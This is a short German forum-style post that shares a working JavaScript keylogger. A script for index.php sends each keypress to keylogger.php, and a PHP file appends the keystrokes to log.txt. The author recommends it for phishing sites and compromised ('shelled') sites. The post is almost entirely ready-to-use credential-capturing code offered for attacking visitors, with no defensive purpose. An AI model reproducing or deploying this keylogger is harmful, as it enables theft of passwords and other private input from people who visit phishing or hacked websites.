hab was ganz Brauchbares gefunden: einen Javascript-Keylogger
index.php
<script type="text/javascript">
document.onkeypress = function(log) {
log = log || window.event;
if (String.fromCharCode(log.charCode)) {
var http = new XMLHttpRequest();
var input = encodeURI(String.fromCharCode(log.charCode));
http.open("POST", "keylogger.php", true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.send("inp=" + input); } }
</script>
keylogger.php
<?php $keylog = $_POST['inp']; if (!empty($keylog)): $fopen = @fopen('log.txt', 'a+'); @fwrite($fopen, $keylog); @fclose($fopen); endif; ?>
Die log.txt wird automatisch erstellt.
Brauchbar für: Phishing-Sites, shelled Sites
hf